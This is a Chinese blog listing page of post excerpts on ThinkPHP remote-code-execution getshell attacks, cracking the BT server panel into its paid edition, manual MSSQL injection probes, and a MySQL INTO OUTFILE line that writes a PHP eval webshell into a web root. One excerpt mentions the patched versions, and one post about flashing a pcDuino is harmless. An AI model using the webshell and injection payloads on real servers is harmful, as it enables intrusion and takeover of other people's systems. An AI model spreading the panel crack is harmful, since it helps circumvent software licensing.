最新消息:

极客/黑客/测试

ThinkPHP远程命令执行漏洞利用(GetShell)

ThinkPHP远程命令执行漏洞利用(GetShell)

yvsm 3年前 (2018-12-13) 476浏览 0评论

最近ThinkPHP致命漏洞(GetShell)好像传遍了各大社区 漏洞分析: 由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本(v5.0.23及v5.1.31以下版本),推荐尽快更新到最新...

thinkphp代码执行getshell的漏洞解决

thinkphp代码执行getshell的漏洞解决

yvsm 3年前 (2018-12-12) 255浏览 0评论

先来简单说说前天thinkphp官方修复的一个getshell漏洞,框架对控制器没有进行足够的检测导致的一处getshell 影响的范围: 5.x < 5.1.31, <= 5.0.23 漏洞危害: 导致系统被提权(你懂的) 这里附上一个...

宝塔面板6.X破解使用专业版

宝塔面板6.X破解使用专业版

yvsm 3年前 (2018-12-12) 442浏览 0评论

2018.11.18 更新 6.5.1破解 首先安装宝塔面板免费版,一键环境后,不要登录宝塔官网账号绑定,直接运行脚本或者升级。 Linux面板6.5安装命令(Centos7.x): yum install -y wget && w...

利用代码破解宝塔面板使用专业版

利用代码破解宝塔面板使用专业版

yvsm 3年前 (2018-12-12) 365浏览 0评论

首先安装宝塔面板免费版,一键环境后,不要登录宝塔官网账号绑定,直接运行专业版升级指令。 升级指令: wget -O update.sh http://download.bt.cn/install/update_pro.sh && b...

手工MSSQL注入常用SQL语句

手工MSSQL注入常用SQL语句

yvsm 3年前 (2018-12-11) 306浏览 0评论

and exists (select * from sysobjects) //判断是否是MSSQL and exists(select * from tableName) //判断某表是否存在..tableName为表名 and 1=(...

利用Thinkphp 5缓存漏洞实现前台Getshell

利用Thinkphp 5缓存漏洞实现前台Getshell

yvsm 4年前 (2018-01-18) 208浏览 0评论

0×00 背景 网站为了实现加速访问,会将用户访问过的页面存入缓存来减小数据库查询的开销。而Thinkphp5框架的缓存漏洞使得在缓存中注入代码成为可能。(漏洞详情见参考资料) 本文将会详细讲解: 1. 如何判断缓存漏洞存在的可能性 2. 如何利用T...

pcDuino 刷系统-卡刷

pcDuino 刷系统-卡刷

yvsm 5年前 (2016-06-14) 600浏览 0评论

准备: pcduino 支持HDMI的显示器: 至少1张4G microSD卡,如果内存卡不大,可以用内存卡刷内核,用u盘刷系统 背景: 本教程中使用的电脑为Windows7系统,其他windows系统一般都可能适用。 其他系统电脑,诸如MAC、Li...

MySql写入一句话木马

MySql写入一句话木马

yvsm 5年前 (2016-06-13) 1492浏览 0评论

拿到数据库权限后向服务器写入SHELL select'<?php @eval($_POST[-9]);?>'INTO OUTFILE 'D:\wwwroot\wordpress\bs.php' 如果没有写入成功,可以尝试转义: selec...

木马GetShell的另类姿势 Trojan GetShell

木马GetShell的另类姿势 Trojan GetShell

yvsm 5年前 (2016-06-11) 588浏览 0评论

0×00 工欲善其事,必先利其器 其实吧,之前是想写一长篇小说的,把整个过程详细的写一遍,怕各位看官拍砖,转了话风 …… 中间件: XAMPP(能运行PHP程序即可) ‍‍武器: Chrome浏览器、Proxy SwitchySharp代理插...